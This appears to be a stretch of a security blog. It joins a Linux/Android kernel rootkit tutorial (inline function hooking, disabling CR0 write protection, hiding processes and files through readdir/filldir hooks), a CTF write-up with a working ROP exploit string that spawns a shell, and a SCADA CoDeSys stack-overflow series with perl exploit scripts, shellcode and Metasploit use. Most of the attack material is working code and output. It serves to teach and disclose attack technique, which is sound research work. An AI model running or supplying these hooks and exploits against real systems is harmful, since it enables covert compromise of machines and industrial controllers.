        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops.  This protection may be trivially circumvented, however, by setting the WP bit in the cr0 register to 0, which disables write protection on the CPU.  Wikipedia’s article on control registers confirms this property:

Bit   Name   Full name       Description
16    WP     Write protect   Determines whether the CPU can write to pages marked read-only
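In terms of plain bit arithmetic, clearing WP is a single mask operation. The sketch below only shows that arithmetic on an ordinary integer and does not touch the real register. CR0_WP, clear_wp() and wp_is_set() are hypothetical names, with CR0_WP carrying the same value as the kernel's X86_CR0_WP constant.

```c
#define CR0_WP_BIT 16
#define CR0_WP     (1UL << CR0_WP_BIT)   /* 0x00010000 */

/* Returns the given cr0 value with the write-protect bit cleared. */
unsigned long clear_wp ( unsigned long cr0 )
{
    return cr0 & ~CR0_WP;
}

/* Returns 1 if the write-protect bit is set in the given cr0 value. */
int wp_is_set ( unsigned long cr0 )
{
    return (cr0 & CR0_WP) != 0;
}
```

For a sample value of 0x80050033, clear_wp() yields 0x80040033, and writing the saved original value back restores the protection.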

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations.  The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM.  For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture.  While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.
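The ARM-mode trampoline can be assembled byte by byte in the same way. The following is a minimal sketch assuming a little-endian ARM target. build_arm_trampoline(), is_thumb_target() and put_le32() are hypothetical names. The address is stored twice because reading pc in ARM state yields the current instruction's address plus 8, so ldr pc, [pc, #0] fetches the word at offset 8 of the trampoline.

```c
#include <stdint.h>

#define HIJACK_SIZE_ARM 12

/* Thumb function pointers carry bit 0 set; like the listing above, any
 * target that is not 4-byte aligned is treated as Thumb. */
int is_thumb_target ( uint32_t target )
{
    return (target % 4) != 0;
}

/* Store a 32-bit value in little-endian byte order. */
static void put_le32 ( unsigned char *p, uint32_t v )
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* ARM-mode trampoline: ldr pc, [pc, #0] followed by two copies of addr.
 * The load reads the copy at offset 8. */
void build_arm_trampoline ( unsigned char out[HIJACK_SIZE_ARM], uint32_t addr )
{
    put_le32(&out[0], 0xe59ff000u);     /* ldr pc, [pc, #0] */
    put_le32(&out[4], addr);
    put_le32(&out[8], addr);
}
```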

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions.  It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits.  However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory.  According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code.  The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors.  It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages.  A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification.  While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe.  By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called.  Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine.  However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion.  This is more an issue of poor implementation than any insurmountable design flaw, and there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion.  Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For illustration, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = {
    .llseek     = generic_file_llseek,
    .read       = generic_read_dir,
    .readdir    = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync      = ext3_sync_file,
    .release    = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output.  To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    // filp_open() reports failure with an ERR_PTR() value, never NULL
    filep = filp_open(path, O_RDONLY, 0);
    if ( IS_ERR(filep) )
        return NULL;

    ret = filep->f_op->readdir;

    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory.  This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide.  If a match is found, the callback returns 0 and the item is hidden from the directory listing.  Otherwise, the original proc_filldir() function is executed and its value returned.

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}
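The readdir/filldir swap described above is easy to model outside the kernel.  The following Python sketch is only an illustration of the callback-wrapping idea; none of these names exist in Suterusu, and unlike the C version (which runs every name through simple_strtol()) it skips non-numeric names such as "self" outright.

```python
from typing import Callable, Iterable, Set

# A filldir-style callback: receives one entry name, returns 0 to continue.
FillDir = Callable[[str], int]


def real_readdir(entries: Iterable[str], filldir: FillDir) -> int:
    """Stand-in for the original readdir: feeds every entry to the callback."""
    for name in entries:
        if filldir(name) != 0:
            break
    return 0


def make_hiding_readdir(hidden_pids: Set[int]):
    """Build a readdir replacement that swaps in a filtering callback."""

    def hooked_readdir(entries: Iterable[str], original_filldir: FillDir) -> int:
        def filtering_filldir(name: str) -> int:
            if name.isdigit() and int(name) in hidden_pids:
                return 0  # report success, but never pass the entry along
            return original_filldir(name)

        return real_readdir(entries, filtering_filldir)

    return hooked_readdir


seen = []
hooked = make_hiding_readdir({1337})
hooked(["1", "1337", "self", "42"], lambda name: seen.append(name) or 0)
```

After the call, seen holds every entry except "1337".  The caller's own callback never learns the entry existed, which is why tools built on directory listings stop seeing the process.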

MIT/LL CTF Writeup (Ticket Server)

This past weekend, I led team ” ” in the 2012 MIT Lincoln Lab CTF where we captured the flag for being the most offensive team, specifically, performing the most unique compromises of team + service.  No, literally, we won the flag:


Team ” “, from left to right: Michael Weissbacher, Amat Cama, Me, Travis Donnell, Ryan Rickert

One of the services we were tasked to install was a client-facing WordPress widget called Ticket that dispatched out to a binary backend.  In order to interact with the widget, users were required to first authenticate with the site using OpenID.

The widget kept a local database of users registered with the service in the text file /usr/share/wordpress/data.txt, where entries were stored in the format:

<display name>:<hashed WordPress password>:<CC number>

Users’ PII served as flags in the competition, so access to this data was coveted.  However, this part was simple as the database installed itself readable to the web root.  What we really wanted was a shell.

Adding and updating one’s own user entry in the database was handled by the following Ruby code listening as a Sinatra server on port 9494:

post '/ticket' do
  text = File.read("/usr/share/wordpress/data.txt")
  if (text.match(/^#{Regexp.escape(params['tuser'])}:#{Regexp.escape(params['tpassword'])}:.+$/)
     text.gsub!( /^#{Regexp.escape(params['tuser'])}:#{Regexp.escape(params['tpassword'])}:.+$/ , (params['tuser'] + ':' + params['tpassword'] + ':' + params['tccn'])))
  else
    text.concat(params['tuser'] + ':' + params['tpassword'] + ':' + params['tccn'] + "\n")
  end
  File.open("/usr/share/wordpress/data.txt", "w") {|file| file.write text}
  redirect url
end

Existing user:password:ccn tuples would be updated and new accounts would be appended to the end of the file.  Note that each field of data is arbitrarily controlled by the user.
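For readers who don't speak Ruby, here is a rough Python model of the same update-or-append behaviour.  It is my own sketch and not the service's code: the function name upsert is made up, and it works on a string instead of the real data.txt.

```python
import re


def upsert(db_text: str, user: str, password: str, ccn: str) -> str:
    """Replace the line for user:password if present, else append a new one."""
    # Ruby's ^ and $ always anchor on lines; Python needs re.MULTILINE for that.
    pattern = re.compile(
        "^" + re.escape(user) + ":" + re.escape(password) + ":.+$",
        re.MULTILINE,
    )
    entry = user + ":" + password + ":" + ccn
    # A callable replacement keeps backslashes in user input from being
    # interpreted as group references.
    new_text, count = pattern.subn(lambda _match: entry, db_text)
    if count == 0:
        new_text = db_text + entry + "\n"
    return new_text


db = upsert("", "a", "b", "1111")
db = upsert(db, "a", "b", "2222")      # updates the existing line
db = upsert(db, "c", "d", "X" * 2000)  # nothing limits the field length
```

The last call is the interesting one: nothing in this logic bounds the size of a field, so an entry of any length ends up in the file.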

Subsequent visits to the WordPress site would trigger the widget to perform a lookup in the text file for the currently logged in user, which was handled by a binary named ‘movie’. The resulting command was crafted like:

movie 'displayname:$H$ashedpassword'

where the display name was sanitized by the following regex:

preg_replace("/[^a-zA-Z0-9 ]+/", "", $name);

A match in the database would prompt the binary to return a generated token based on the user’s information.  However, what happens if we insert an unreasonably long entry in the database and then match it?

sysadmin@ctf-portal:~/ticket$ ./movie 'a:b'
Segmentation fault

Yup, memory corruption!  The application fails to check the length of the database entry before copying it onto the stack, resulting in a fairly straightforward stack-based overflow (which allows null bytes!).  Control over the return pointer / RIP was achieved at offset 1048:

sysadmin@ctf-portal:~/ticket$ gdb --quiet ./movie
Reading symbols from /home/sysadmin/ticket/movie...(no debugging symbols found)...done.
(gdb) run 'a:b'
Starting program: /home/sysadmin/ticket/movie 'a:b'
db5b35a4de8aa0f6

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400e75 in confirmation ()
(gdb) x/i $rip
=> 0x400e75 :	retq
(gdb) x/xg $rsp
0x7fffffffe5c8:	0x4242424242424242

The game VMs were configured with NX enabled and ASLR disabled; however, we still needed to write the exploit without hardcoded stack addresses due to the differing environments of each team.

For a separate command injection exploit in the competition, our payload method was just to inject a wget + chmod + execute command which fetched a reverse shell from one of our boxes.  With ASLR disabled, it was decided the simplest path for this exploit would be just to return to system() and execute the same command string, saving the trouble of writing shellcode and marking a region of memory (writable-)executable.

Since the x86_64 calling convention on Linux passes arguments via registers starting at RDI, we’d need to ROP a little to store the address of our command string in RDI before calling system() without using hardcoded stack addresses.  So we fire up ROPeMe and slice apart libc:

sysadmin@ctf-portal:~/ropeme64$ ./ropshell64
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate /lib/x86_64-linux-gnu/libc.so.6 4
Generating gadgets for /lib/x86_64-linux-gnu/libc.so.6 with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/2
Processing code block 2/2
Generated 22371 gadgets
Dumping asm gadgets to file: libc.so.6.ggt ...
OK

An initial search for gadgets that manipulate RDI produced some nice results:

ROPeMe> search mov rdi %
Searching for ROP gadget:  mov rdi % with constraints: []
0x163e02L: mov rdi [rdi+0x10] ; test rdi rdi ; jnz 0x163dfd ; pop rbx ;;
0x460d9L: mov rdi [rdi+0x68] ; xor eax eax ;;
0x6f2dcL: mov rdi [rdi+0xe0] ; jmp rax ; nop dword [rax] ; mov rax 0xffffffffffffffff ;;
0x6f38cL: mov rdi [rdi+0xe0] ; jmp rax ; nop dword [rax] ; xor eax eax ;;
0x487f0L: mov rdi rdx ; mov [rsi] al ; jnz 0x487d0 ; mov rax rsi ;;
0x11a194L: mov rdi rsp ; call rax ; add rsp 0x38 ;;
0x127d10L: mov rdi rsp ; call rdx ; add rsp 0x38 ;;

libc is nice enough to store the current RSP address to RDI and immediately CALL the value of either RAX or RDX.  If we store our command string directly at the end of the ROP chain, RDI should contain the correct address at the time of the CALL.  We just need to find a “POP RAX” gadget to load the address of system() into RAX and our exploit is complete.

ROPeMe> search pop rax
Searching for ROP gadget:  pop rax with constraints: []
0x23950L: pop rax ;;
0x476e7L: pop rax ;;
0x476e8L: pop rax ;;

The first one should do fine.  Add each gadget address to the base address of libc (0x7ffff7a1b000), obtained by inspecting /proc/pid/maps like so:

sysadmin@ctf-portal:~/ticket$ gdb --quiet ./movie
Reading symbols from /home/sysadmin/ticket/movie...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x400e7a
(gdb) run
Starting program: /home/sysadmin/ticket/movie 

Breakpoint 1, 0x0000000000400e7a in main ()
(gdb) shell
sysadmin@ctf-portal:~/ticket$ ps aux | grep movie
sysadmin  2662  0.2  1.0  50372 11160 pts/0    S    20:05   0:00 gdb --quiet ./movie
sysadmin  2664  0.0  0.0   4160   352 pts/0    t    20:05   0:00 /home/sysadmin/ticket/movie
sysadmin  2722  0.0  0.0   8104   920 pts/0    S+   20:05   0:00 grep --color=auto movie
sysadmin@ctf-portal:~/ticket$ grep libc /proc/2664/maps
7ffff7a1b000-7ffff7bd0000 r-xp 00000000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7bd0000-7ffff7dcf000 ---p 001b5000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dcf000-7ffff7dd3000 r--p 001b4000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dd3000-7ffff7dd5000 rw-p 001b8000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
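The address arithmetic is simple enough to do by hand, but a few lines of Python make it harder to fat-finger.  This is just a sketch: the helper names are mine, the maps line is the executable libc mapping from the output above, and the offsets are the ones ROPeMe reported.

```python
import struct

# The r-xp (executable) libc mapping from /proc/2664/maps above.
MAPS_LINE = (
    "7ffff7a1b000-7ffff7bd0000 r-xp 00000000 08:01 106"
    "                        /lib/x86_64-linux-gnu/libc-2.15.so"
)


def mapping_base(maps_line: str) -> int:
    """Start address of a /proc/<pid>/maps entry (the text before the dash)."""
    return int(maps_line.split("-", 1)[0], 16)


def rebase(base: int, offset: int) -> bytes:
    """Absolute gadget address, packed as a little-endian 64-bit word."""
    return struct.pack("<Q", base + offset)


libc_base = mapping_base(MAPS_LINE)
pop_rax = rebase(libc_base, 0x23950)                 # pop rax
mov_rdi_rsp_call_rax = rebase(libc_base, 0x11a194)   # mov rdi rsp ; call rax
```

Printing pop_rax.hex() gives 50e9a3f7ff7f0000, which is the byte order the payload needs.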

And our finished PoC looks like:

sysadmin@ctf-portal:~/ticket$ sudo su -
root@ctf-portal:~# perl -e'print "a:b:" . "A"x1044 . "\x50\xe9\xa3\xf7\xff\x7f\x00\x00" . "\x60\x06\xa6\xf7\xff\x7f\x00\x00" . "\x94\x51\xb3\xf7\xff\x7f\x00\x00" . "/bin/sh"' > /usr/share/wordpress/data.txt
root@ctf-portal:~# logout
sysadmin@ctf-portal:~/ticket$ ./movie 'a:b'
2b7e6fb14408cb4f
$

Dissecting the exploit string for greater clarity:

"a:b:" . "A"x1044 .                  # Padding
"\x50\xe9\xa3\xf7\xff\x7f\x00\x00" . # POP RAX
"\x60\x06\xa6\xf7\xff\x7f\x00\x00" . # &system
"\x94\x51\xb3\xf7\xff\x7f\x00\x00" . # MOV RDI, RSP; CALL RAX
"/bin/sh"                            # String literal "/bin/sh"

The actual exploit string required delivery over HTTP POST and a second request to the home page to trigger the exploit.
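If it isn't obvious why the command string can sit right behind the chain without us knowing any stack address, stepping through the three stack words by hand helps.  The Python below is a toy model of just those steps, not an emulator.  STACK_TOP is an arbitrary value I picked for illustration, and the trailing NUL is my assumption about how the copied string ends up terminated.

```python
import struct

STACK_TOP = 0x7fffffffe5c8  # illustrative only; the chain never depends on it

chain = b"".join(struct.pack("<Q", word) for word in (
    0x7ffff7a3e950,  # pop rax ; ret
    0x7ffff7a60660,  # &system
    0x7ffff7b35194,  # mov rdi, rsp ; call rax
)) + b"/bin/sh\x00"


def qword_at(rsp: int) -> int:
    """Read the 8-byte word the simulated RSP currently points at."""
    return struct.unpack_from("<Q", chain, rsp - STACK_TOP)[0]


rsp = STACK_TOP

rip = qword_at(rsp)  # retq in confirmation() pops the first gadget address
rsp += 8

rax = qword_at(rsp)  # pop rax: RAX now holds &system
rsp += 8

rip = qword_at(rsp)  # ret: RIP now points at the second gadget
rsp += 8

rdi = rsp            # mov rdi, rsp: RSP has just walked past the chain
command = chain[rdi - STACK_TOP:].split(b"\x00", 1)[0]
```

At the moment of the call, RDI equals STACK_TOP + 24, which is wherever the string happens to live.  Change STACK_TOP to anything else and command is still /bin/sh.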

Anatomy of a SCADA Exploit: Part 2 – From EIP to Shell

Last post, we identified a stack-based overflow in 3S CoDeSys CmpWebServer and traced the steps necessary to obtain control over EIP.  In order to do so, we needed to first circumvent stack cookies, which was achieved by abusing a call to memcpy() and overwriting the function call’s own return pointer.  This post, we’ll pick up where we left off and learn how to spawn a shell on the remote host.

We’ll be working with the same setup as last time, targeting CoDeSys v3.4 SP4 Patch 2 running on Windows XP SP3.  An important detail to note here is that while Windows XP SP3 implements DEP, it is by default only enabled on system-critical processes:

This means that the stack in our target application is fair game and allows fully for a “traditional” overflow.  Now, I don’t know about you, but I happen to find that incredibly lame.  So, we’ll split the exploitation portion of this post into two sections.  In the first section, we’ll take full advantage of the resources provided to us and spawn a shell using the traditional return-into-shellcode method.  Since this series isn’t meant to be a simple walkthrough but instead a learning experience, in the second section we’ll spawn a shell again but instead enable DEP for the running application.  This prevents us from simply overwriting the return pointer with a pointer to the stack, so we’ll have to first disable DEP using Return-Oriented Programming (ROP) and then return into arbitrary code.

When Good Bytes Go Bad

Before we proceed to writing the exploit itself, we must first identify any bad characters that might cause issues later on.  This means any bytes that may get filtered out, translate to different bytes, or break the exploit altogether.  This is not typically a time-consuming task, but if many characters are filtered or manipulated by the program it can be tedious to identify exactly what is and isn’t allowed as input.

A quick and dirty way of approaching this is the “range method,” as suggested by the Metasploit development community.  Instead of linearly enumerating a range of 256 bytes and manually (or semi-automatically) testing each byte individually, we instead provide a broader range of bytes in each attempt and systematically narrow it down to specific offenders, somewhat akin to a binary search.

We can whip up a quick script (using the structure of the PoC from last post) to test:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1; # Don't fall through and connect with no target
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$badchars = "";
$badchars .= "GET /";
$badchars .= pack("C*", 0x00 .. 0x0f);
#$badchars .= pack("C*", 0x10 .. 0x1f);
#$badchars .= pack("C*", 0x20 .. 0x2f);
#$badchars .= pack("C*", 0x30 .. 0x3f);
#$badchars .= pack("C*", 0x40 .. 0x4f);
#$badchars .= pack("C*", 0x50 .. 0x5f);
#$badchars .= pack("C*", 0x60 .. 0x6f);
#$badchars .= pack("C*", 0x70 .. 0x7f);
#$badchars .= pack("C*", 0x80 .. 0x8f);
#$badchars .= pack("C*", 0x90 .. 0x9f);
#$badchars .= pack("C*", 0xa0 .. 0xaf);
#$badchars .= pack("C*", 0xb0 .. 0xbf);
#$badchars .= pack("C*", 0xc0 .. 0xcf);
#$badchars .= pack("C*", 0xd0 .. 0xdf);
#$badchars .= pack("C*", 0xe0 .. 0xef);
#$badchars .= pack("C*", 0xf0 .. 0xff);
$badchars .= "\\a HTTP/1.0\r\n\r\n";

print $sock $badchars;

Run the script against CoDeSys, and…

Well that’s interesting.  Looks like none of our input was copied into the buffer, predictably due to the initial null byte.  Since the section of code we’ve looked at thus far has used memcpy() as opposed to strcpy(), it’s reasonable to assume that string functions like strlen() are used at some point beforehand and are causing our buffer to terminate prematurely.  We’ll add 0x00 to the list of bad chars and try again.

$badchars .= "GET /";
# Bad chars: "\x00"
$badchars .= pack("C*", 0x01 .. 0x0f);

Taking a look at the stack after the memcpy():

What the heck?  Something else in the range must be causing issues.  Let’s narrow the range:

$badchars .= pack("C*", 0x01 .. 0x09);
#$badchars .= pack("C*", 0x0a .. 0x0f);

And finally we have success:

If you look closely, though, notice that 0x09 was translated to 0x20, so we’ll add it to the list of bad chars as well.

To save time, we won’t detail the rest of the testing.  Following the same steps as outlined above for the remaining bytes, we produce the final list of bad characters to avoid when writing our exploit:

0x00 (Null) - Breaks request
0x09 (Tab) - Translates to 0x20 (Space)
0x0a (Line Feed) - Breaks request
0x23 (#) - Breaks request
0x25 (%) - Breaks request
0x3a (:) - Breaks request
0x3d (=) - Breaks request
0x3f (?) - Breaks request
0x5c (\) - Translates to 0x2f (/)

As we can see, most of the offending bytes are URL special characters.  With more thorough testing and analysis we realize that, in actuality, some of the chars can be used if positioned correctly in the buffer, but to save potential frustration we’ll just blacklist them initially and consider their usage only if necessary.
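The range method lends itself to automation if you have some way to read back what landed in the buffer.  Here's a hedged Python sketch of the narrowing step.  The oracle is hypothetical (in practice that step was me staring at the stack in a debugger), and simulated_target is a stand-in built from the list above rather than anything that talks to CoDeSys.  It also ignores the position-dependent behaviour just mentioned.

```python
from typing import Callable, List, Optional

# Hypothetical oracle: delivers the bytes and returns what ended up in the
# buffer, or None if the request broke altogether.
Oracle = Callable[[bytes], Optional[bytes]]


def find_bad_chars(candidates: bytes, oracle: Oracle) -> List[int]:
    """Return the bytes in `candidates` that do not survive unchanged."""
    if not candidates:
        return []
    if oracle(candidates) == candidates:
        return []                    # the whole range came through clean
    if len(candidates) == 1:
        return [candidates[0]]       # narrowed down to a single offender
    mid = len(candidates) // 2
    return (find_bad_chars(candidates[:mid], oracle)
            + find_bad_chars(candidates[mid:], oracle))


# Simulated target, for demonstration only.
BREAKS = {0x00, 0x0a, 0x23, 0x25, 0x3a, 0x3d, 0x3f}
TRANSLATES = {0x09: 0x20, 0x5c: 0x2f}


def simulated_target(data: bytes) -> Optional[bytes]:
    if any(byte in BREAKS for byte in data):
        return None
    return bytes(TRANSLATES.get(byte, byte) for byte in data)


bad = find_bad_chars(bytes(range(256)), simulated_target)
```

Against the simulated target, bad comes back as the same nine bytes listed above.  Clean ranges are dismissed with a single request each, which is the whole point of testing ranges instead of individual bytes.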

SCADA Wars Episode 1 – The Shellcode Menace

Writing a traditional stack-based overflow is a rather straightforward process when both DEP and ASLR are disabled/not implemented.  Simply overwrite the return pointer on the stack with a pointer to your buffer, slide down an optional NOP sled, and execute your shellcode.  Recall the script we wrote last post that obtained arbitrary control over EIP (cleaned up a bit to remove the no longer necessary cyclic pattern):

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1; # Don't fall through and connect with no target
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x0defaced); # Control over EIP
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)
$exploit .= "A"x463;
$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

Running against the target web server, we observe an exception executing at our (invalid) return address:

At this point we’ll inspect the stack to learn the location of our buffer, noting the beginning address of the second string of “A”s where we’ll place our shellcode:

Updating our script to reflect this new information, as well as the inclusion of a benign payload for PoC:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>\n";
    exit 1; # Don't fall through and connect with no target
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

# Windows XP SP3 EN Calc Shellcode 16 Bytes by John Leitch
$shellcode =
    "\x31\xC9"              . # xor ecx,ecx
    "\x51"                  . # push ecx
    "\x68\x63\x61\x6C\x63"  . # push 0x636c6163
    "\x54"                  . # push dword ptr esp
    "\xB8\xC7\x93\xC2\x77"  . # mov eax,0x77c293c7
    "\xFF\xD0";               # call eax

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x02cdfc2c); # Control over EIP, pointer to shellcode
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)
$exploit .= $shellcode;
$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

And the result:

Cool.  We’ve successfully exploited this version of CoDeSys on Windows XP SP3.

There are two issues with our current exploit, though.  In terms of functionality, calc.exe is rather boring and doesn’t actually spawn us a shell.  In terms of elegance and standardization, it’s best not to write standalone exploit scripts such as the one above.  To the rescue is the Metasploit Framework, which provides a very nice exploit development API, as well as a long list of payloads and encoding utilities to circumvent bad characters and potential IDS.  As a result, as of revision bc9014e9, the CoDeSys CmpWebServer exploit module in Metasploit now possesses a target for v3.4 SP4 Patch 2 on Windows XP SP3.  Let’s test it out:

msf > use exploit/windows/scada/codesys_web_server
msf  exploit(codesys_web_server) > show options

Module options (exploit/windows/scada/codesys_web_server):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  8080             yes       The target port

msf  exploit(codesys_web_server) > set RHOST 172.16.66.128
RHOST => 172.16.66.128
msf  exploit(codesys_web_server) > show targets

Exploit targets:

   Id  Name
